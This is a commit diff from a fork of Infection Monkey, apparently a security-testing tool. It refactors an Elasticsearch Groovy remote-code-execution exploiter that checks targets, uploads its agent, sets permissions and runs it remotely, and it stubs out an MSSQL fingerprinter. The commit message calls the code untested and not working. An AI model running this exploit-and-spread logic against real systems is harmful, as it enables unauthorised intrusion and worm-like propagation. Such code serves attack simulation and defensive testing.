p15670423
/
monkey
1
0
Fork 5
Code Issues Pull Requests 3 Projects Releases Wiki Activity

Uploaded and modified standard web_rce code usage.Not working, not tested

This commit is contained in:
Vakaris 2018-07-20 18:15:15 +03:00
parent 3f809403d1
commit 8ddfb03f27
2 changed files with 44 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
infection_monkey/exploit/elasticgroovy.py
View File

@ -9,17 +9,17 @@ import logging
import requests
from exploit import HostExploiter
from model import DROPPER_ARG
from network.elasticfinger import ES_SERVICE, ES_PORT
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
from exploit.web_rce import WebRCE
__author__ = 'danielg'
LOG = logging.getLogger(__name__)
class ElasticGroovyExploiter(HostExploiter):
class ElasticGroovyExploiter(WebRCE):
# attack URLs
BASE_URL = 'http://%s:%s/_search?pretty'
MONKEY_RESULT_FIELD = "monkey_result"
@ -38,40 +38,52 @@ class ElasticGroovyExploiter(HostExploiter):
def __init__(self, host):
super(ElasticGroovyExploiter, self).__init__(host)
self._config = __import__('config').WormConfiguration
self.skip_exist = self._config.skip_exploit_if_file_exist
def is_os_supported(self):
"""
Checks if the host is vulnerable.
Either using version string or by trying to attack
:return:
"""
if not super(ElasticGroovyExploiter, self).is_os_supported():
return False
def exploit_host(self):
# self.exploit_host_linux()
if ES_SERVICE not in self.host.services:
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
return False
major, minor, build = self.host.services[ES_SERVICE]['version'].split('.')
major = int(major)
minor = int(minor)
build = int(build)
if major > 1:
# We need a reference to the exploiter for WebRCE framework to use
exploiter = self.exploit
# Build url from host and elastic port(not https)
urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty'])
vulnerable_urls = []
for url in urls:
if WebRCE.check_if_exploitable(exploiter, url):
vulnerable_urls.append(url)
self._exploit_info['vulnerable_urls'] = vulnerable_urls
if not vulnerable_urls:
return False
if major == 1 and minor > 4:
return False
if major == 1 and minor == 4 and build > 2:
return False
return self.is_vulnerable()
def exploit_host(self):
real_host_os = self.get_host_os()
self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters
if 'linux' in self.host.os['type']:
return self.exploit_host_linux()
else:
return self.exploit_host_windows()
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
return False
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
# We can't use 'if not' because response may be ''
if data is not False and data['response'] == False:
return False
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
return False
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
return False
return True
def exploit(self, url, command):
payload = self.JAVA_CMD % command
response = requests.get(url, data=payload)
result = self.get_results(response)
if not result: # not vulnerable
return False
return result[0]
def exploit_host_windows(self):
"""

3
infection_monkey/network/mssql_fingerprint.py
View File

@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger):
Discovered server information written to the Host info struct.
True if success, False otherwise.
"""
# TODO remove auto-return
return False
assert isinstance(host, VictimHost)
# Create a UDP socket and sets a timeout